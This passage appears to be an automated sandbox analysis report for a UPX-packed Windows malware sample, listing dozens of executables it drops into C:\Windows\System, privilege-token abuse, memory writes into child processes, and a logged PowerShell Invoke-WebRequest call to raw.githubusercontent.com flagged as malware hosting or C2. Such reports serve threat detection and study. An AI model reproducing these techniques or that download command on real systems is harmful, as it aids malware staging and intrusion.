N/A N/A C:\Windows\System\UkGrWVg.exe N/A
N/A N/A C:\Windows\System\vwcYVRO.exe N/A
N/A N/A C:\Windows\System\IAXeMei.exe N/A
N/A N/A C:\Windows\System\CZmzaHz.exe N/A
N/A N/A C:\Windows\System\dPyeeYb.exe N/A
N/A N/A C:\Windows\System\hlLsOIU.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\weLYxPH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\YmKwMPz.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\PRYcxjj.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\GmJvqxY.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\xQgzAHg.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\KPyUmkR.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\fGCmrrB.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\UZlZLQI.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\dHLYXFy.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\QQBlDDY.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\BujIunM.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\jqIkQLw.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\KREEUUK.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\qkURpBQ.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\lDFTurE.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\UawmrZA.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\WLFjKXu.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\gCgQJXG.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\iacaeYn.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\ZZKsgGx.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\HYexRYo.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\kUEEsbO.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\aAMMICG.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\XAFNLDG.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\LhBbrit.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\goHqOsH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\JWcXNjS.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\asbypsu.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\EwiKSdj.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\VVHlTzy.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\SflMxut.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\XqEMgCE.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\jwbWhok.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\QeOIyFF.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\oTTtvkT.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\pOLeQjT.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\oMCeDEl.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\VUogSqV.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\BskoovH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\lFKsiHS.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\tHpqnak.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\HiavdNQ.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\yDfrSSk.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\tiTMGib.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\xieNViQ.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\EbhFaxB.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\RrSMaqU.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\GLUbgPH.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\YonLOzA.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\BYOUrgX.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\zFcfUBd.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\TomqBct.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\mUTgJhb.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\OvniXrk.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\CZFLxAg.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\RsmjxDU.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\vPnVneO.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\RlxIzJv.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\HxAtVqM.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\bvGBgEC.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\igoiXca.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\vcnyKOJ.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\MjLnQrs.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
File created C:\Windows\System\lcmbqfr.exe C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2372 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 4972 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2372 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\fmDrabk.exe
PID 2372 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\fmDrabk.exe
PID 2372 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\hMnTExN.exe
PID 2372 wrote to memory of 1664 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\hMnTExN.exe
PID 2372 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EGniESX.exe
PID 2372 wrote to memory of 1840 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EGniESX.exe
PID 2372 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\qlkmZUM.exe
PID 2372 wrote to memory of 960 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\qlkmZUM.exe
PID 2372 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FyTQrDl.exe
PID 2372 wrote to memory of 3568 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\FyTQrDl.exe
PID 2372 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\YuWxLpO.exe
PID 2372 wrote to memory of 1948 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\YuWxLpO.exe
PID 2372 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oITwYhe.exe
PID 2372 wrote to memory of 4064 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\oITwYhe.exe
PID 2372 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\lSqNBUj.exe
PID 2372 wrote to memory of 4436 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\lSqNBUj.exe
PID 2372 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\AwUdIrx.exe
PID 2372 wrote to memory of 2620 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\AwUdIrx.exe
PID 2372 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vNLqBmi.exe
PID 2372 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vNLqBmi.exe
PID 2372 wrote to memory of 272 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\Bodjjga.exe
PID 2372 wrote to memory of 272 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\Bodjjga.exe
PID 2372 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\mWucDFa.exe
PID 2372 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\mWucDFa.exe
PID 2372 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vJIYnYD.exe
PID 2372 wrote to memory of 4308 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\vJIYnYD.exe
PID 2372 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BSXNdRL.exe
PID 2372 wrote to memory of 2800 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\BSXNdRL.exe
PID 2372 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EwiKSdj.exe
PID 2372 wrote to memory of 3648 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\EwiKSdj.exe
PID 2372 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\rbhPyWt.exe
PID 2372 wrote to memory of 4072 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\rbhPyWt.exe
PID 2372 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\ElJtHMd.exe
PID 2372 wrote to memory of 3728 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\ElJtHMd.exe
PID 2372 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\DkeKZUw.exe
PID 2372 wrote to memory of 1004 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\DkeKZUw.exe
PID 2372 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\uSFiJCd.exe
PID 2372 wrote to memory of 1960 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\uSFiJCd.exe
PID 2372 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\tDKWYLE.exe
PID 2372 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\tDKWYLE.exe
PID 2372 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\hFSSyao.exe
PID 2372 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\hFSSyao.exe
PID 2372 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\PWKYJpE.exe
PID 2372 wrote to memory of 4828 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\PWKYJpE.exe
PID 2372 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KLbocAj.exe
PID 2372 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\KLbocAj.exe
PID 2372 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\hnseAjG.exe
PID 2372 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\hnseAjG.exe
PID 2372 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\IjWotQK.exe
PID 2372 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\IjWotQK.exe
PID 2372 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\cfCTZzd.exe
PID 2372 wrote to memory of 2160 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\cfCTZzd.exe
PID 2372 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\cSbJYQK.exe
PID 2372 wrote to memory of 4572 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\cSbJYQK.exe
PID 2372 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\yceiviu.exe
PID 2372 wrote to memory of 4792 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\yceiviu.exe
PID 2372 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\DfuLVmz.exe
PID 2372 wrote to memory of 4380 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\DfuLVmz.exe
PID 2372 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\OcvEpdF.exe
PID 2372 wrote to memory of 4800 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\OcvEpdF.exe
PID 2372 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\WnTtJXd.exe
PID 2372 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe C:\Windows\System\WnTtJXd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe

"C:\Users\Admin\AppData\Local\Temp\b30f361ec39a71c8495d5e357c3dcdcac4422070cec577f7a316266121e2509a.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\fmDrabk.exe

C:\Windows\System\fmDrabk.exe

C:\Windows\System\hMnTExN.exe

C:\Windows\System\hMnTExN.exe

C:\Windows\System\EGniESX.exe

C:\Windows\System\EGniESX.exe

C:\Windows\System\qlkmZUM.exe

C:\Windows\System\qlkmZUM.exe

C:\Windows\System\FyTQrDl.exe

C:\Windows\System\FyTQrDl.exe

C:\Windows\System\YuWxLpO.exe

C:\Windows\System\YuWxLpO.exe

C:\Windows\System\oITwYhe.exe

C:\Windows\System\oITwYhe.exe

C:\Windows\System\lSqNBUj.exe

C:\Windows\System\lSqNBUj.exe

C:\Windows\System\AwUdIrx.exe

C:\Windows\System\AwUdIrx.exe

C:\Windows\System\vNLqBmi.exe

C:\Windows\System\vNLqBmi.exe

C:\Windows\System\Bodjjga.exe

C:\Windows\System\Bodjjga.exe

C:\Windows\System\mWucDFa.exe

C:\Windows\System\mWucDFa.exe

C:\Windows\System\vJIYnYD.exe

C:\Windows\System\vJIYnYD.exe

C:\Windows\System\BSXNdRL.exe

C:\Windows\System\BSXNdRL.exe

C:\Windows\System\EwiKSdj.exe

C:\Windows\System\EwiKSdj.exe

C:\Windows\System\rbhPyWt.exe

C:\Windows\System\rbhPyWt.exe

C:\Windows\System\ElJtHMd.exe

C:\Windows\System\ElJtHMd.exe

C:\Windows\System\DkeKZUw.exe

C:\Windows\System\DkeKZUw.exe

C:\Windows\System\uSFiJCd.exe

C:\Windows\System\uSFiJCd.exe

C:\Windows\System\tDKWYLE.exe

C:\Windows\System\tDKWYLE.exe

C:\Windows\System\hFSSyao.exe

C:\Windows\System\hFSSyao.exe

C:\Windows\System\PWKYJpE.exe

C:\Windows\System\PWKYJpE.exe

C:\Windows\System\KLbocAj.exe

C:\Windows\System\KLbocAj.exe

C:\Windows\System\hnseAjG.exe

C:\Windows\System\hnseAjG.exe

C:\Windows\System\IjWotQK.exe

C:\Windows\System\IjWotQK.exe

C:\Windows\System\cfCTZzd.exe

C:\Windows\System\cfCTZzd.exe

C:\Windows\System\cSbJYQK.exe

C:\Windows\System\cSbJYQK.exe

C:\Windows\System\yceiviu.exe

C:\Windows\System\yceiviu.exe

C:\Windows\System\DfuLVmz.exe

C:\Windows\System\DfuLVmz.exe

C:\Windows\System\OcvEpdF.exe

C:\Windows\System\OcvEpdF.exe

C:\Windows\System\WnTtJXd.exe

